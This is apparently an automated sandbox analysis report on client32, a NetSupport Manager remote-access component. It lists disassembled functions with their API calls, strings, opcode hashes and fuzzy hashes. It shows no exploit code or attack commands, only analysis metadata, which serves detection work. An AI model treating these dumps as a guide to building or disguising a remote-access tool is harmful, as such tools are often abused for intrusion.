Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsRangeRectScrollSystemWindow$ClientPoints
String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
API String ID: 2854462819-2052393828
Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1113C3C0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151windowtimeCOMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 1113C41F
IsWindow.USER32(00000000), ref: 1113C451
_malloc.LIBCMT ref: 1113C4B0
_memmove.LIBCMT ref: 1113C515
SendMessageTimeoutA.USER32(00000000,0000004A,0003047A,00000003,00000002,00002710,?), ref: 1113C56F
_free.LIBCMT ref: 1113C576

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1113C49A, 1113C4D1, 1113C4FD, 1113C53B
IsA(), xrefs: 1113C49F, 1113C4D6, 1113C502, 1113C540

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1602665774-2270926670
Opcode ID: 0ed9dbacaa5111b75372f285ffc0dc290807717fd132d9b03b1a64193d20bbdf
Instruction ID: a2dd537b469b56fd0a393197ec2e6fa62d94d6918f16b8d23f7c7785d4e9094b
Opcode Fuzzy Hash: 0ed9dbacaa5111b75372f285ffc0dc290807717fd132d9b03b1a64193d20bbdf
Instruction Fuzzy Hash: 5D51C134A0120AAFDB00DF94DD81FEEF7B9EF89718F104125F915A7284E771AA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33

wsprintfA.USER32 ref: 1100977F
wsprintfA.USER32 ref: 11009799
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883

Strings

ApprovedWebList, xrefs: 11009788
.%u, xrefs: 11009779
Store\, xrefs: 11009820
%s%s.htm, xrefs: 11009793

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
String ID: %s%s.htm$.%u$ApprovedWebList$Store\
API String ID: 559337438-1872371932
Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 110D8180 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147networkCOMMON

Download Yara Rule

APIs

Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,0CBC1010,?,?,?,1117EE88,000000FF), ref: 110DEB61

Part of subcall function 110E1B10: FormatMessageA.KERNEL32(00001200,00000000,0CBC1010,00000400,?,?,00000000,00000401,0CBC1010,110D862B,00000000,?), ref: 110E1B80

Part of subcall function 11010CD0: _memmove.LIBCMT ref: 11010D0D

shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D81F9
closesocket.WSOCK32(?), ref: 110D8203
__CxxThrowException@8.LIBCMT ref: 110D8229
_memset.LIBCMT ref: 110D827C
gethostname.WSOCK32(?,00000200,0000005C,00000000,?), ref: 110D8290
gethostbyname.WSOCK32(?), ref: 110D82C1
inet_ntoa.WSOCK32 ref: 110D82EC

Strings

127.0.0.1, xrefs: 110D82A7

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8FormatMessageSectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
String ID: 127.0.0.1
API String ID: 2982652134-3619153832
Opcode ID: 81e226c822f52d23f860b4cab65ea293995ad13d8c0aeed6422b565828bb0ec1
Instruction ID: aa17ea021d3ed84f241b33fe3108128a88572c75fddb31a861601ff691f486d7
Opcode Fuzzy Hash: 81e226c822f52d23f860b4cab65ea293995ad13d8c0aeed6422b565828bb0ec1
Instruction Fuzzy Hash: C651B675D00758AFDB24CFA4C884B9EFBB8EB08714F00466DE45697680DB75AA48CF90

Uniqueness

Uniqueness Score: -1.00%

Function 11148010 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 11148023
wsprintfA.USER32 ref: 111480A3
IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
wsprintfA.USER32 ref: 111480E8
wsprintfA.USER32 ref: 11148105

Strings

EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114809D
%02X , xrefs: 111480E2
Callstack:, xrefs: 111480FF

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$CurrentReadThread
String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
API String ID: 477357799-160799177
Opcode ID: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
Instruction ID: 6f7d134abcf48abb40f6f3b0b22a813e08fdaf2ee64347ae44ec59e5a96c1c79
Opcode Fuzzy Hash: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
Instruction Fuzzy Hash: 23410DB1200705AFDB54CFA8DC90F97B7E9BB48608F148918F96DC7644DB30B914CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1115E030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0CBC1010,00000200,?,00000000), ref: 1115E109
LoadLibraryA.KERNEL32(Kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70), ref: 1115E11F
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70,000000FF), ref: 1115E15E
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1115E16D
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70), ref: 1115E188
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70), ref: 1115E19F

Strings

IsWow64Process, xrefs: 1115E164
Kernel32.dll, xrefs: 1115E117

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentErrorFreeLastLoadProcProcessVersion
String ID: IsWow64Process$Kernel32.dll
API String ID: 3538738240-2893920747
Opcode ID: 850259ebba5e8cc6ff371a45d106c87311dff1256d72a400a880712de0f3549a
Instruction ID: d8a79cc34645d9a59af90b50c19e1ef7305455585782c9f2ec00b50da8ce639a
Opcode Fuzzy Hash: 850259ebba5e8cc6ff371a45d106c87311dff1256d72a400a880712de0f3549a
Instruction Fuzzy Hash: 45519CB1D45B99DFDB60CFAA858469AFFF0BB09204F90892ED0AEE3600D7306504CF61

Uniqueness

Uniqueness Score: -1.00%

Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 1100521E
_memset.LIBCMT ref: 11005240
GetMenuItemID.USER32(?,00000000), ref: 11005254
CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
EnableMenuItem.USER32 ref: 110052C7
GetMenuItemInfoA.USER32 ref: 110052E8
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314

Strings

0, xrefs: 1100524D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D750
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
_memset.LIBCMT ref: 1101D77A
RegisterClassExA.USER32(?), ref: 1101D7BB
CreateWindowExA.USER32 ref: 1101D7EE
GetWindowRect.USER32 ref: 1101D7FB
DestroyWindow.USER32(00000000), ref: 1101D802

Strings

NSMChatSizeWnd, xrefs: 1101D75C, 1101D7B1, 1101D7E8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11121410 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1112144F
_malloc.LIBCMT ref: 1112146F
_memmove.LIBCMT ref: 11121515
_free.LIBCMT ref: 11121544

Part of subcall function 11120080: DeleteObject.GDI32(?), ref: 111200AE
Part of subcall function 11120080: SelectObject.GDI32(?,?), ref: 111200C2
Part of subcall function 11120080: DeleteObject.GDI32(00000000), ref: 111200C9
Part of subcall function 11120080: SelectPalette.GDI32 ref: 111200EF
Part of subcall function 11120080: SetStretchBltMode.GDI32(?,00000001), ref: 1112011B

Strings

idata->dcaf_buf, xrefs: 1112148B
idata->dcaf_datalen + datalen <= idata->dcaf_buflen, xrefs: 111214F6
..\ctl32\Remote.cpp, xrefs: 11121486, 111214BA, 111214F1
seq == ++(idata->dcaf_seq), xrefs: 111214BF

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect_free$ModePaletteStretch_malloc_memmove
String ID: ..\ctl32\Remote.cpp$idata->dcaf_buf$idata->dcaf_datalen + datalen <= idata->dcaf_buflen$seq == ++(idata->dcaf_seq)
API String ID: 4211713597-2117459032
Opcode ID: 5fccd0f541b38237e3f8b97fcaa62b7bc6084773968a6d2e1a1b67e8f004d66f
Instruction ID: 5455deb223179d8475a85570d2e5c7b4f0b65bab9b1842e8e2bf744840464a8c
Opcode Fuzzy Hash: 5fccd0f541b38237e3f8b97fcaa62b7bc6084773968a6d2e1a1b67e8f004d66f
Instruction Fuzzy Hash: 1231E9BAE447026BD210CF74EC51BABF7E8AF4060CF194429E99E96241E731B500C755

Uniqueness

Uniqueness Score: -1.00%

Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 1100953A
_strncmp.LIBCMT ref: 1100954A
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0CBC1010), ref: 110095EB

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
https://, xrefs: 1100952F
IsA(), xrefs: 110095A5, 110095CD
<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 11009571
http://, xrefs: 11009535, 11009548

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
API String ID: 1635020204-3154135529
Opcode ID: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
Opcode Fuzzy Hash: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 1114513D
_memset.LIBCMT ref: 1114515E
GetMenuItemInfoA.USER32 ref: 1114519B
CreatePopupMenu.USER32 ref: 111451AA
GetMenuItemCount.USER32 ref: 111451D3
InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
GetMenuItemCount.USER32 ref: 111451EB

Strings

0, xrefs: 11145177

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

